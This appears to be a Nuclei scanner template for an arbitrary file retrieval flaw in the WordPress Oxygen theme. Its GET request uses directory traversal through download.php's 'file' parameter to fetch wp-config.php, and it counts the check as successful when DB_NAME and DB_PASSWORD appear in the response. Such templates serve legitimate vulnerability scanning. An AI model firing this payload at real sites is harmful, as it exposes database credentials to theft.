29 lines
693 B
YAML
29 lines
693 B
YAML
id: wp-oxygen-theme-lfi
|
|
|
|
info:
|
|
name: WordPress Oxygen-Theme - Arbitrary File Retrieval
|
|
author: 0x_Akoko
|
|
severity: high
|
|
description: The WordPress Oxygen-Theme has a local file retrieval vulnerability in 'file' parameter of 'download.php'.
|
|
reference:
|
|
- https://cxsecurity.com/issue/WLB-2019030178
|
|
tags: wordpress,wp-theme,lfi
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/wp-content/themes/oxygen-theme/download.php?file=../../../wp-config.php'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- "DB_NAME"
|
|
- "DB_PASSWORD"
|
|
part: body
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|